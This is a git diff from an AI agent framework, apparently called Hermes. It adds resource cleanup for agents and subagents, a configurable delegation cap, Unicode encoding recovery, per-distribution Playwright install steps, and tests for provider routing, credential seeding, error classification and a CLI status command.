# try to clean it up on a dead asyncio event loop (which
|
||||
# produces "Event loop is closed" errors in the terminal).
|
||||
# Close all resources (httpx client, subprocesses, etc.) so
|
||||
# GC doesn't try to clean them up on a dead asyncio event
|
||||
# loop (which produces "Event loop is closed" errors).
|
||||
if review_agent is not None:
|
||||
client = getattr(review_agent, "client", None)
|
||||
if client is not None:
|
||||
try:
|
||||
review_agent._close_openai_client(
|
||||
client, reason="bg_review_done", shared=True
|
||||
)
|
||||
review_agent.client = None
|
||||
except Exception:
|
||||
pass
|
||||
try:
|
||||
review_agent.close()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
t = threading.Thread(target=_run_review, daemon=True, name="bg-review")
|
||||
t.start()
|
||||
@@ -2630,6 +2724,64 @@ class AIAgent:
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
def close(self) -> None:
|
||||
"""Release all resources held by this agent instance.
|
||||
|
||||
Cleans up subprocess resources that would otherwise become orphans:
|
||||
- Background processes tracked in ProcessRegistry
|
||||
- Terminal sandbox environments
|
||||
- Browser daemon sessions
|
||||
- Active child agents (subagent delegation)
|
||||
- OpenAI/httpx client connections
|
||||
|
||||
Safe to call multiple times (idempotent). Each cleanup step is
|
||||
independently guarded so a failure in one does not prevent the rest.
|
||||
"""
|
||||
task_id = getattr(self, "session_id", None) or ""
|
||||
|
||||
# 1. Kill background processes for this task
|
||||
try:
|
||||
from tools.process_registry import process_registry
|
||||
process_registry.kill_all(task_id=task_id)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 2. Clean terminal sandbox environments
|
||||
try:
|
||||
from tools.terminal_tool import cleanup_vm
|
||||
cleanup_vm(task_id)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 3. Clean browser daemon sessions
|
||||
try:
|
||||
from tools.browser_tool import cleanup_browser
|
||||
cleanup_browser(task_id)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 4. Close active child agents
|
||||
try:
|
||||
with self._active_children_lock:
|
||||
children = list(self._active_children)
|
||||
self._active_children.clear()
|
||||
for child in children:
|
||||
try:
|
||||
child.close()
|
||||
except Exception:
|
||||
pass
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# 5. Close the OpenAI/httpx client
|
||||
try:
|
||||
client = getattr(self, "client", None)
|
||||
if client is not None:
|
||||
self._close_openai_client(client, reason="agent_close", shared=True)
|
||||
self.client = None
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
def _hydrate_todo_store(self, history: List[Dict[str, Any]]) -> None:
|
||||
"""
|
||||
Recover todo state from conversation history.
|
||||
@@ -2922,7 +3074,7 @@ class AIAgent:
|
||||
|
||||
@staticmethod
|
||||
def _cap_delegate_task_calls(tool_calls: list) -> list:
|
||||
"""Truncate excess delegate_task calls to MAX_CONCURRENT_CHILDREN.
|
||||
"""Truncate excess delegate_task calls to max_concurrent_children.
|
||||
|
||||
The delegate_tool caps the task list inside a single call, but the
|
||||
model can emit multiple separate delegate_task tool_calls in one
|
||||
@@ -2930,23 +3082,24 @@ class AIAgent:
|
||||
|
||||
Returns the original list if no truncation was needed.
|
||||
"""
|
||||
from tools.delegate_tool import MAX_CONCURRENT_CHILDREN
|
||||
from tools.delegate_tool import _get_max_concurrent_children
|
||||
max_children = _get_max_concurrent_children()
|
||||
delegate_count = sum(1 for tc in tool_calls if tc.function.name == "delegate_task")
|
||||
if delegate_count <= MAX_CONCURRENT_CHILDREN:
|
||||
if delegate_count <= max_children:
|
||||
return tool_calls
|
||||
kept_delegates = 0
|
||||
truncated = []
|
||||
for tc in tool_calls:
|
||||
if tc.function.name == "delegate_task":
|
||||
if kept_delegates < MAX_CONCURRENT_CHILDREN:
|
||||
if kept_delegates < max_children:
|
||||
truncated.append(tc)
|
||||
kept_delegates += 1
|
||||
else:
|
||||
truncated.append(tc)
|
||||
logger.warning(
|
||||
"Truncated %d excess delegate_task call(s) to enforce "
|
||||
"MAX_CONCURRENT_CHILDREN=%d limit",
|
||||
delegate_count - MAX_CONCURRENT_CHILDREN, MAX_CONCURRENT_CHILDREN,
|
||||
"max_concurrent_children=%d limit",
|
||||
delegate_count - max_children, max_children,
|
||||
)
|
||||
return truncated
|
||||
|
||||
@@ -5005,7 +5158,7 @@ class AIAgent:
|
||||
# when no explicit key is in the fallback config.
|
||||
if fb_base_url_hint and "ollama.com" in fb_base_url_hint.lower() and not fb_api_key_hint:
|
||||
fb_api_key_hint = os.getenv("OLLAMA_API_KEY") or None
|
||||
fb_client, _ = resolve_provider_client(
|
||||
fb_client, _resolved_fb_model = resolve_provider_client(
|
||||
fb_provider, model=fb_model, raw_codex=True,
|
||||
explicit_base_url=fb_base_url_hint,
|
||||
explicit_api_key=fb_api_key_hint)
|
||||
@@ -5014,6 +5167,12 @@ class AIAgent:
|
||||
"Fallback to %s failed: provider not configured",
|
||||
fb_provider)
|
||||
return self._try_activate_fallback() # try next in chain
|
||||
try:
|
||||
from hermes_cli.model_normalize import normalize_model_for_provider
|
||||
|
||||
fb_model = normalize_model_for_provider(fb_model, fb_provider)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Determine api_mode from provider / base URL
|
||||
fb_api_mode = "chat_completions"
|
||||
@@ -5498,7 +5657,7 @@ class AIAgent:
|
||||
preserve_dots=self._anthropic_preserve_dots(),
|
||||
context_length=ctx_len,
|
||||
base_url=getattr(self, "_anthropic_base_url", None),
|
||||
fast_mode=self.request_overrides.get("speed") == "fast",
|
||||
fast_mode=(self.request_overrides or {}).get("speed") == "fast",
|
||||
)
|
||||
|
||||
if self.api_mode == "codex_responses":
|
||||
@@ -7162,7 +7321,7 @@ class AIAgent:
|
||||
self._thinking_prefill_retries = 0
|
||||
self._last_content_with_tools = None
|
||||
self._mute_post_response = False
|
||||
self._surrogate_sanitized = False
|
||||
self._unicode_sanitization_passes = 0
|
||||
|
||||
# Pre-turn connection health check: detect and clean up dead TCP
|
||||
# connections left over from provider outages or dropped streams.
|
||||
@@ -7602,6 +7761,7 @@ class AIAgent:
|
||||
|
||||
finish_reason = "stop"
|
||||
response = None # Guard against UnboundLocalError if all retries fail
|
||||
api_kwargs = None # Guard against UnboundLocalError in except handler
|
||||
|
||||
while retry_count < max_retries:
|
||||
try:
|
||||
@@ -8147,22 +8307,40 @@ class AIAgent:
|
||||
self.thinking_callback("")
|
||||
|
||||
# -----------------------------------------------------------
|
||||
# Surrogate character recovery. UnicodeEncodeError happens
|
||||
# when the messages contain lone surrogates (U+D800..U+DFFF)
|
||||
# that are invalid UTF-8. Common source: clipboard paste
|
||||
# from Google Docs or similar rich-text editors. We sanitize
|
||||
# the entire messages list in-place and retry once.
|
||||
# UnicodeEncodeError recovery. Two common causes:
|
||||
# 1. Lone surrogates (U+D800..U+DFFF) from clipboard paste
|
||||
# (Google Docs, rich-text editors) — sanitize and retry.
|
||||
# 2. ASCII codec on systems with LANG=C or non-UTF-8 locale
|
||||
# (e.g. Chromebooks) — any non-ASCII character fails.
|
||||
# Detect via the error message mentioning 'ascii' codec.
|
||||
# We sanitize messages in-place and may retry twice:
|
||||
# first to strip surrogates, then once more for pure
|
||||
# ASCII-only locale sanitization if needed.
|
||||
# -----------------------------------------------------------
|
||||
if isinstance(api_error, UnicodeEncodeError) and not getattr(self, '_surrogate_sanitized', False):
|
||||
self._surrogate_sanitized = True
|
||||
if _sanitize_messages_surrogates(messages):
|
||||
if isinstance(api_error, UnicodeEncodeError) and getattr(self, '_unicode_sanitization_passes', 0) < 2:
|
||||
_err_str = str(api_error).lower()
|
||||
_is_ascii_codec = "'ascii'" in _err_str or "ascii" in _err_str
|
||||
_surrogates_found = _sanitize_messages_surrogates(messages)
|
||||
if _surrogates_found:
|
||||
self._unicode_sanitization_passes += 1
|
||||
self._vprint(
|
||||
f"{self.log_prefix}⚠️ Stripped invalid surrogate characters from messages. Retrying...",
|
||||
force=True,
|
||||
)
|
||||
continue
|
||||
# Surrogates weren't in messages — might be in system
|
||||
# prompt or prefill. Fall through to normal error path.
|
||||
if _is_ascii_codec:
|
||||
# ASCII codec: the system encoding can't handle
|
||||
# non-ASCII characters at all. Sanitize all
|
||||
# non-ASCII content from messages and retry.
|
||||
if _sanitize_messages_non_ascii(messages):
|
||||
self._unicode_sanitization_passes += 1
|
||||
self._vprint(
|
||||
f"{self.log_prefix}⚠️ System encoding is ASCII — stripped non-ASCII characters from messages. Retrying...",
|
||||
force=True,
|
||||
)
|
||||
continue
|
||||
# Nothing to sanitize in messages — might be in system
|
||||
# prompt or prefill. Fall through to normal error path.
|
||||
|
||||
status_code = getattr(api_error, "status_code", None)
|
||||
error_context = self._extract_api_error_context(api_error)
|
||||
@@ -8618,9 +8796,10 @@ class AIAgent:
|
||||
if self._try_activate_fallback():
|
||||
retry_count = 0
|
||||
continue
|
||||
self._dump_api_request_debug(
|
||||
api_kwargs, reason="non_retryable_client_error", error=api_error,
|
||||
)
|
||||
if api_kwargs is not None:
|
||||
self._dump_api_request_debug(
|
||||
api_kwargs, reason="non_retryable_client_error", error=api_error,
|
||||
)
|
||||
self._emit_status(
|
||||
f"❌ Non-retryable error (HTTP {status_code}): "
|
||||
f"{self._summarize_api_error(api_error)}"
|
||||
@@ -8723,9 +8902,10 @@ class AIAgent:
|
||||
self.log_prefix, max_retries, _final_summary,
|
||||
_provider, _model, len(api_messages), f"{approx_tokens:,}",
|
||||
)
|
||||
self._dump_api_request_debug(
|
||||
api_kwargs, reason="max_retries_exhausted", error=api_error,
|
||||
)
|
||||
if api_kwargs is not None:
|
||||
self._dump_api_request_debug(
|
||||
api_kwargs, reason="max_retries_exhausted", error=api_error,
|
||||
)
|
||||
self._persist_session(messages, conversation_history)
|
||||
_final_response = f"API call failed after {max_retries} retries: {_final_summary}"
|
||||
if _is_stream_drop:
|
||||
|
||||
+35
-6
@@ -1082,10 +1082,19 @@ install_node_deps() {
|
||||
log_success "Node.js dependencies installed"
|
||||
|
||||
# Install Playwright browser + system dependencies.
|
||||
# Playwright's install-deps only supports apt/dnf/zypper natively.
|
||||
# Playwright's --with-deps only supports apt-based systems natively.
|
||||
# For Arch/Manjaro we install the system libs via pacman first.
|
||||
# Other systems must install Chromium dependencies manually.
|
||||
log_info "Installing browser engine (Playwright Chromium)..."
|
||||
case "$DISTRO" in
|
||||
ubuntu|debian|raspbian|pop|linuxmint|elementary|zorin|kali|parrot)
|
||||
log_info "Playwright may request sudo to install browser system dependencies (shared libraries)."
|
||||
log_info "This is standard Playwright setup — Hermes itself does not require root access."
|
||||
cd "$INSTALL_DIR" && npx playwright install --with-deps chromium 2>/dev/null || {
|
||||
log_warn "Playwright browser installation failed — browser tools will not work."
|
||||
log_warn "Try running manually: cd $INSTALL_DIR && npx playwright install --with-deps chromium"
|
||||
}
|
||||
;;
|
||||
arch|manjaro)
|
||||
if command -v pacman &> /dev/null; then
|
||||
log_info "Arch/Manjaro detected — installing Chromium system dependencies via pacman..."
|
||||
@@ -1100,15 +1109,35 @@ install_node_deps() {
|
||||
log_warn " sudo pacman -S nss atk at-spi2-core cups libdrm libxkbcommon mesa pango cairo alsa-lib"
|
||||
fi
|
||||
fi
|
||||
cd "$INSTALL_DIR" && npx playwright install chromium 2>/dev/null || true
|
||||
cd "$INSTALL_DIR" && npx playwright install chromium 2>/dev/null || {
|
||||
log_warn "Playwright browser installation failed — browser tools will not work."
|
||||
}
|
||||
;;
|
||||
fedora|rhel|centos|rocky|alma)
|
||||
log_warn "Playwright does not support automatic dependency installation on RPM-based systems."
|
||||
log_info "Install Chromium system dependencies manually before using browser tools:"
|
||||
log_info " sudo dnf install nss atk at-spi2-core cups-libs libdrm libxkbcommon mesa-libgbm pango cairo alsa-lib"
|
||||
cd "$INSTALL_DIR" && npx playwright install chromium 2>/dev/null || {
|
||||
log_warn "Playwright browser installation failed — install dependencies above and retry."
|
||||
}
|
||||
;;
|
||||
opensuse*|sles)
|
||||
log_warn "Playwright does not support automatic dependency installation on zypper-based systems."
|
||||
log_info "Install Chromium system dependencies manually before using browser tools:"
|
||||
log_info " sudo zypper install mozilla-nss libatk-1_0-0 at-spi2-core cups-libs libdrm2 libxkbcommon0 Mesa-libgbm1 pango cairo libasound2"
|
||||
cd "$INSTALL_DIR" && npx playwright install chromium 2>/dev/null || {
|
||||
log_warn "Playwright browser installation failed — install dependencies above and retry."
|
||||
}
|
||||
;;
|
||||
*)
|
||||
log_info "Playwright may request sudo to install browser system dependencies (shared libraries)."
|
||||
log_info "This is standard Playwright setup — Hermes itself does not require root access."
|
||||
cd "$INSTALL_DIR" && npx playwright install --with-deps chromium 2>/dev/null || true
|
||||
log_warn "Playwright does not support automatic dependency installation on $DISTRO."
|
||||
log_info "Install Chromium/browser system dependencies for your distribution, then run:"
|
||||
log_info " cd $INSTALL_DIR && npx playwright install chromium"
|
||||
log_info "Browser tools will not work until dependencies are installed."
|
||||
cd "$INSTALL_DIR" && npx playwright install chromium 2>/dev/null || true
|
||||
;;
|
||||
esac
|
||||
log_success "Browser engine installed"
|
||||
log_success "Browser engine setup complete"
|
||||
fi
|
||||
|
||||
# Install WhatsApp bridge dependencies
|
||||
|
||||
@@ -658,6 +658,19 @@ class TestGetTextAuxiliaryClient:
|
||||
assert client is None
|
||||
assert model is None
|
||||
|
||||
def test_custom_endpoint_uses_codex_wrapper_when_runtime_requests_responses_api(self):
|
||||
with patch("agent.auxiliary_client._resolve_custom_runtime",
|
||||
return_value=("https://api.openai.com/v1", "sk-test", "codex_responses")), \
|
||||
patch("agent.auxiliary_client._read_main_model", return_value="gpt-5.3-codex"), \
|
||||
patch("agent.auxiliary_client.OpenAI") as mock_openai:
|
||||
client, model = get_text_auxiliary_client()
|
||||
|
||||
from agent.auxiliary_client import CodexAuxiliaryClient
|
||||
assert isinstance(client, CodexAuxiliaryClient)
|
||||
assert model == "gpt-5.3-codex"
|
||||
assert mock_openai.call_args.kwargs["base_url"] == "https://api.openai.com/v1"
|
||||
assert mock_openai.call_args.kwargs["api_key"] == "sk-test"
|
||||
|
||||
|
||||
class TestVisionClientFallback:
|
||||
"""Vision client auto mode resolves known-good multimodal backends."""
|
||||
@@ -1111,3 +1124,45 @@ class TestCallLlmPaymentFallback:
|
||||
task="compression",
|
||||
messages=[{"role": "user", "content": "hello"}],
|
||||
)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Gate: _resolve_api_key_provider must skip anthropic when not configured
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_resolve_api_key_provider_skips_unconfigured_anthropic(monkeypatch):
|
||||
"""_resolve_api_key_provider must not try anthropic when user never configured it."""
|
||||
from collections import OrderedDict
|
||||
from hermes_cli.auth import ProviderConfig
|
||||
|
||||
# Build a minimal registry with only "anthropic" so the loop is guaranteed
|
||||
# to reach it without being short-circuited by earlier providers.
|
||||
fake_registry = OrderedDict({
|
||||
"anthropic": ProviderConfig(
|
||||
id="anthropic",
|
||||
name="Anthropic",
|
||||
auth_type="api_key",
|
||||
inference_base_url="https://api.anthropic.com",
|
||||
api_key_env_vars=("ANTHROPIC_API_KEY",),
|
||||
),
|
||||
})
|
||||
|
||||
called = []
|
||||
|
||||
def mock_try_anthropic():
|
||||
called.append("anthropic")
|
||||
return None, None
|
||||
|
||||
monkeypatch.setattr("agent.auxiliary_client._try_anthropic", mock_try_anthropic)
|
||||
monkeypatch.setattr("hermes_cli.auth.PROVIDER_REGISTRY", fake_registry)
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth.is_provider_explicitly_configured",
|
||||
lambda pid: False,
|
||||
)
|
||||
|
||||
from agent.auxiliary_client import _resolve_api_key_provider
|
||||
_resolve_api_key_provider()
|
||||
|
||||
assert "anthropic" not in called, \
|
||||
"_try_anthropic() should not be called when anthropic is not explicitly configured"
|
||||
|
||||
@@ -12,6 +12,17 @@ def _isolate(tmp_path, monkeypatch):
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
for env_var in (
|
||||
"AUXILIARY_VISION_PROVIDER",
|
||||
"AUXILIARY_VISION_MODEL",
|
||||
"AUXILIARY_VISION_BASE_URL",
|
||||
"AUXILIARY_VISION_API_KEY",
|
||||
"CONTEXT_VISION_PROVIDER",
|
||||
"CONTEXT_VISION_MODEL",
|
||||
"CONTEXT_VISION_BASE_URL",
|
||||
"CONTEXT_VISION_API_KEY",
|
||||
):
|
||||
monkeypatch.delenv(env_var, raising=False)
|
||||
# Write a minimal config so load_config doesn't fail
|
||||
(hermes_home / "config.yaml").write_text("model:\n default: test-model\n")
|
||||
|
||||
@@ -149,3 +160,83 @@ class TestResolveProviderClientNamedCustom:
|
||||
# "coffee" doesn't exist in custom_providers
|
||||
client, model = resolve_provider_client("coffee", "test")
|
||||
assert client is None
|
||||
|
||||
|
||||
class TestResolveProviderClientModelNormalization:
|
||||
"""Direct-provider auxiliary routing should normalize models like main runtime."""
|
||||
|
||||
def test_matching_native_prefix_is_stripped_for_main_provider(self, tmp_path):
|
||||
_write_config(tmp_path, {
|
||||
"model": {"default": "zai/glm-5.1", "provider": "zai"},
|
||||
})
|
||||
with (
|
||||
patch("hermes_cli.auth.resolve_api_key_provider_credentials", return_value={
|
||||
"api_key": "glm-key",
|
||||
"base_url": "https://api.z.ai/api/paas/v4",
|
||||
}),
|
||||
patch("agent.auxiliary_client.OpenAI") as mock_openai,
|
||||
):
|
||||
mock_openai.return_value = MagicMock()
|
||||
from agent.auxiliary_client import resolve_provider_client
|
||||
|
||||
client, model = resolve_provider_client("main", "zai/glm-5.1")
|
||||
|
||||
assert client is not None
|
||||
assert model == "glm-5.1"
|
||||
|
||||
def test_non_matching_prefix_is_preserved_for_direct_provider(self, tmp_path):
|
||||
_write_config(tmp_path, {
|
||||
"model": {"default": "zai/glm-5.1", "provider": "zai"},
|
||||
})
|
||||
with (
|
||||
patch("hermes_cli.auth.resolve_api_key_provider_credentials", return_value={
|
||||
"api_key": "glm-key",
|
||||
"base_url": "https://api.z.ai/api/paas/v4",
|
||||
}),
|
||||
patch("agent.auxiliary_client.OpenAI") as mock_openai,
|
||||
):
|
||||
mock_openai.return_value = MagicMock()
|
||||
from agent.auxiliary_client import resolve_provider_client
|
||||
|
||||
client, model = resolve_provider_client("zai", "google/gemini-2.5-pro")
|
||||
|
||||
assert client is not None
|
||||
assert model == "google/gemini-2.5-pro"
|
||||
|
||||
def test_aggregator_vendor_slug_is_preserved(self, monkeypatch):
|
||||
monkeypatch.setenv("OPENROUTER_API_KEY", "or-key")
|
||||
with patch("agent.auxiliary_client.OpenAI") as mock_openai:
|
||||
mock_openai.return_value = MagicMock()
|
||||
from agent.auxiliary_client import resolve_provider_client
|
||||
|
||||
client, model = resolve_provider_client(
|
||||
"openrouter", "anthropic/claude-sonnet-4.6"
|
||||
)
|
||||
|
||||
assert client is not None
|
||||
assert model == "anthropic/claude-sonnet-4.6"
|
||||
|
||||
|
||||
class TestResolveVisionProviderClientModelNormalization:
|
||||
"""Vision auto-routing should reuse the same provider-specific normalization."""
|
||||
|
||||
def test_vision_auto_strips_matching_main_provider_prefix(self, tmp_path):
|
||||
_write_config(tmp_path, {
|
||||
"model": {"default": "zai/glm-5.1", "provider": "zai"},
|
||||
})
|
||||
with (
|
||||
patch("agent.auxiliary_client._read_nous_auth", return_value=None),
|
||||
patch("hermes_cli.auth.resolve_api_key_provider_credentials", return_value={
|
||||
"api_key": "glm-key",
|
||||
"base_url": "https://api.z.ai/api/paas/v4",
|
||||
}),
|
||||
patch("agent.auxiliary_client.OpenAI") as mock_openai,
|
||||
):
|
||||
mock_openai.return_value = MagicMock()
|
||||
from agent.auxiliary_client import resolve_vision_provider_client
|
||||
|
||||
provider, client, model = resolve_vision_provider_client()
|
||||
|
||||
assert provider == "zai"
|
||||
assert client is not None
|
||||
assert model == "glm-5.1"
|
||||
|
||||
@@ -83,6 +83,24 @@ def test_parse_references_strips_trailing_punctuation():
|
||||
assert refs[1].target == "https://example.com/docs"
|
||||
|
||||
|
||||
def test_parse_quoted_references_with_spaces_and_preserve_unquoted_ranges():
|
||||
from agent.context_references import parse_context_references
|
||||
|
||||
refs = parse_context_references(
|
||||
'review @file:"C:\\Users\\Simba\\My Project\\main.py":7-9 '
|
||||
'and @folder:"docs and specs" plus @file:src/main.py:1-2'
|
||||
)
|
||||
|
||||
assert [ref.kind for ref in refs] == ["file", "folder", "file"]
|
||||
assert refs[0].target == r"C:\Users\Simba\My Project\main.py"
|
||||
assert refs[0].line_start == 7
|
||||
assert refs[0].line_end == 9
|
||||
assert refs[1].target == "docs and specs"
|
||||
assert refs[2].target == "src/main.py"
|
||||
assert refs[2].line_start == 1
|
||||
assert refs[2].line_end == 2
|
||||
|
||||
|
||||
def test_expand_file_range_and_folder_listing(sample_repo: Path):
|
||||
from agent.context_references import preprocess_context_references
|
||||
|
||||
@@ -106,6 +124,30 @@ def test_expand_file_range_and_folder_listing(sample_repo: Path):
|
||||
assert not result.warnings
|
||||
|
||||
|
||||
def test_expand_quoted_file_reference_with_spaces(tmp_path: Path):
|
||||
from agent.context_references import preprocess_context_references
|
||||
|
||||
workspace = tmp_path / "repo"
|
||||
folder = workspace / "docs and specs"
|
||||
folder.mkdir(parents=True)
|
||||
file_path = folder / "release notes.txt"
|
||||
file_path.write_text("line 1\nline 2\nline 3\n", encoding="utf-8")
|
||||
|
||||
result = preprocess_context_references(
|
||||
'Review @file:"docs and specs/release notes.txt":2-3',
|
||||
cwd=workspace,
|
||||
context_length=100_000,
|
||||
)
|
||||
|
||||
assert result.expanded
|
||||
assert result.message.startswith("Review")
|
||||
assert "line 1" not in result.message
|
||||
assert "line 2" in result.message
|
||||
assert "line 3" in result.message
|
||||
assert "release notes.txt" in result.message
|
||||
assert not result.warnings
|
||||
|
||||
|
||||
def test_expand_git_diff_staged_and_log(sample_repo: Path):
|
||||
from agent.context_references import preprocess_context_references
|
||||
|
||||
|
||||
@@ -567,6 +567,7 @@ def test_singleton_seed_does_not_clobber_manual_oauth_entry(tmp_path, monkeypatc
|
||||
monkeypatch.delenv("ANTHROPIC_API_KEY", raising=False)
|
||||
monkeypatch.delenv("ANTHROPIC_TOKEN", raising=False)
|
||||
monkeypatch.delenv("CLAUDE_CODE_OAUTH_TOKEN", raising=False)
|
||||
monkeypatch.setattr("hermes_cli.auth.is_provider_explicitly_configured", lambda pid: True)
|
||||
_write_auth_store(
|
||||
tmp_path,
|
||||
{
|
||||
@@ -1043,3 +1044,30 @@ def test_release_lease_decrements_counter(tmp_path, monkeypatch):
|
||||
|
||||
pool.release_lease("cred-1")
|
||||
assert pool._active_leases.get("cred-1", 0) == 0
|
||||
|
||||
|
||||
def test_load_pool_does_not_seed_claude_code_when_anthropic_not_configured(tmp_path, monkeypatch):
|
||||
"""Claude Code credentials must not be auto-seeded when the user never selected anthropic."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(tmp_path, {"version": 1, "credential_pool": {}})
|
||||
|
||||
# Claude Code credentials exist on disk
|
||||
monkeypatch.setattr(
|
||||
"agent.anthropic_adapter.read_claude_code_credentials",
|
||||
lambda: {"accessToken": "sk-ant...oken", "refreshToken": "rt", "expiresAt": 9999999999999},
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"agent.anthropic_adapter.read_hermes_oauth_credentials",
|
||||
lambda: None,
|
||||
)
|
||||
# User configured kimi-coding, NOT anthropic
|
||||
monkeypatch.setattr(
|
||||
"hermes_cli.auth.is_provider_explicitly_configured",
|
||||
lambda pid: pid == "kimi-coding",
|
||||
)
|
||||
|
||||
from agent.credential_pool import load_pool
|
||||
pool = load_pool("anthropic")
|
||||
|
||||
# Should NOT have seeded the claude_code entry
|
||||
assert pool.entries() == []
|
||||
|
||||
@@ -249,6 +249,22 @@ class TestClassifyApiError:
|
||||
assert result.reason == FailoverReason.rate_limit
|
||||
assert result.should_fallback is True
|
||||
|
||||
def test_alibaba_rate_increased_too_quickly(self):
|
||||
"""Alibaba/DashScope returns a unique throttling message.
|
||||
|
||||
Port from anomalyco/opencode#21355.
|
||||
"""
|
||||
msg = (
|
||||
"Upstream error from Alibaba: Request rate increased too quickly. "
|
||||
"To ensure system stability, please adjust your client logic to "
|
||||
"scale requests more smoothly over time."
|
||||
)
|
||||
e = MockAPIError(msg, status_code=400)
|
||||
result = classify_api_error(e)
|
||||
assert result.reason == FailoverReason.rate_limit
|
||||
assert result.retryable is True
|
||||
assert result.should_rotate_credential is True
|
||||
|
||||
# ── Server errors ──
|
||||
|
||||
def test_500_server_error(self):
|
||||
|
||||
@@ -0,0 +1,85 @@
|
||||
"""Tests for CLI /status command behavior."""
|
||||
from datetime import datetime
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
from cli import HermesCLI
|
||||
from hermes_cli.commands import resolve_command
|
||||
|
||||
|
||||
def _make_cli():
|
||||
cli_obj = HermesCLI.__new__(HermesCLI)
|
||||
cli_obj.config = {}
|
||||
cli_obj.console = MagicMock()
|
||||
cli_obj.agent = None
|
||||
cli_obj.conversation_history = []
|
||||
cli_obj.session_id = "session-123"
|
||||
cli_obj._pending_input = MagicMock()
|
||||
cli_obj._status_bar_visible = True
|
||||
cli_obj.model = "openai/gpt-5.4"
|
||||
cli_obj.provider = "openai"
|
||||
cli_obj.session_start = datetime(2026, 4, 9, 19, 24)
|
||||
cli_obj._agent_running = False
|
||||
cli_obj._session_db = MagicMock()
|
||||
cli_obj._session_db.get_session.return_value = None
|
||||
return cli_obj
|
||||
|
||||
|
||||
def test_status_command_is_available_in_cli_registry():
|
||||
cmd = resolve_command("status")
|
||||
assert cmd is not None
|
||||
assert cmd.gateway_only is False
|
||||
|
||||
|
||||
def test_process_command_status_dispatches_without_toggling_status_bar():
|
||||
cli_obj = _make_cli()
|
||||
|
||||
with patch.object(cli_obj, "_show_session_status", create=True) as mock_status:
|
||||
assert cli_obj.process_command("/status") is True
|
||||
|
||||
mock_status.assert_called_once_with()
|
||||
assert cli_obj._status_bar_visible is True
|
||||
|
||||
|
||||
def test_statusbar_still_toggles_visibility():
|
||||
cli_obj = _make_cli()
|
||||
|
||||
assert cli_obj.process_command("/statusbar") is True
|
||||
assert cli_obj._status_bar_visible is False
|
||||
|
||||
|
||||
def test_status_prefix_prefers_status_command_over_statusbar_toggle():
|
||||
cli_obj = _make_cli()
|
||||
|
||||
with patch.object(cli_obj, "_show_session_status") as mock_status:
|
||||
assert cli_obj.process_command("/sta") is True
|
||||
|
||||
mock_status.assert_called_once_with()
|
||||
assert cli_obj._status_bar_visible is True
|
||||
|
||||
|
||||
def test_show_session_status_prints_gateway_style_summary():
|
||||
cli_obj = _make_cli()
|
||||
cli_obj.agent = SimpleNamespace(
|
||||
session_total_tokens=321,
|
||||
session_api_calls=4,
|
||||
)
|
||||
cli_obj._session_db.get_session.return_value = {
|
||||
"title": "My titled session",
|
||||
"started_at": 1775791440,
|
||||
}
|
||||
|
||||
with patch("cli.display_hermes_home", return_value="~/.hermes"):
|
||||
cli_obj._show_session_status()
|
||||
|
||||
printed = "\n".join(str(call.args[0]) for call in cli_obj.console.print.call_args_list)
|
||||
assert "Hermes CLI Status" in printed
|
||||
assert "Session ID: session-123" in printed
|
||||
assert "Path: ~/.hermes" in printed
|
||||
assert "Title: My titled session" in printed
|
||||
assert "Model: openai/gpt-5.4 (openai)" in printed
|
||||
assert "Tokens: 321" in printed
|
||||
assert "Agent Running: No" in printed
|
||||
_, kwargs = cli_obj.console.print.call_args
|
||||
assert kwargs.get("highlight") is False
|
||||
assert kwargs.get("markup") is False
|
||||
+151
-59
@@ -1,4 +1,4 @@
|
||||
"""Shared fixtures for Telegram gateway e2e tests.
|
||||
"""Shared fixtures for gateway e2e tests (Telegram, Discord).
|
||||
|
||||
These tests exercise the full async message flow:
|
||||
adapter.handle_message(event)
|
||||
@@ -14,19 +14,22 @@ import sys
|
||||
import uuid
|
||||
from datetime import datetime
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import AsyncMock, MagicMock
|
||||
from unittest.mock import AsyncMock, MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from gateway.config import GatewayConfig, Platform, PlatformConfig
|
||||
from gateway.platforms.base import MessageEvent, SendResult
|
||||
from gateway.session import SessionEntry, SessionSource, build_session_key
|
||||
|
||||
|
||||
#Ensure telegram module is available (mock it if not installed)
|
||||
# Platform library mocks
|
||||
|
||||
# Ensure telegram module is available (mock it if not installed)
|
||||
def _ensure_telegram_mock():
|
||||
"""Install mock telegram modules so TelegramAdapter can be imported."""
|
||||
if "telegram" in sys.modules and hasattr(sys.modules["telegram"], "__file__"):
|
||||
return # Real library installed
|
||||
return # Real library installed
|
||||
|
||||
telegram_mod = MagicMock()
|
||||
telegram_mod.Update = MagicMock()
|
||||
@@ -51,24 +54,118 @@ def _ensure_telegram_mock():
|
||||
sys.modules.setdefault(name, telegram_mod)
|
||||
|
||||
|
||||
_ensure_telegram_mock()
|
||||
# Ensure discord module is available (mock it if not installed)
|
||||
def _ensure_discord_mock():
|
||||
"""Install mock discord modules so DiscordAdapter can be imported."""
|
||||
if "discord" in sys.modules and hasattr(sys.modules["discord"], "__file__"):
|
||||
return # Real library installed
|
||||
|
||||
discord_mod = MagicMock()
|
||||
discord_mod.Intents.default.return_value = MagicMock()
|
||||
discord_mod.DMChannel = type("DMChannel", (), {})
|
||||
discord_mod.Thread = type("Thread", (), {})
|
||||
discord_mod.ForumChannel = type("ForumChannel", (), {})
|
||||
discord_mod.Interaction = object
|
||||
discord_mod.app_commands = SimpleNamespace(
|
||||
describe=lambda **kwargs: (lambda fn: fn),
|
||||
choices=lambda **kwargs: (lambda fn: fn),
|
||||
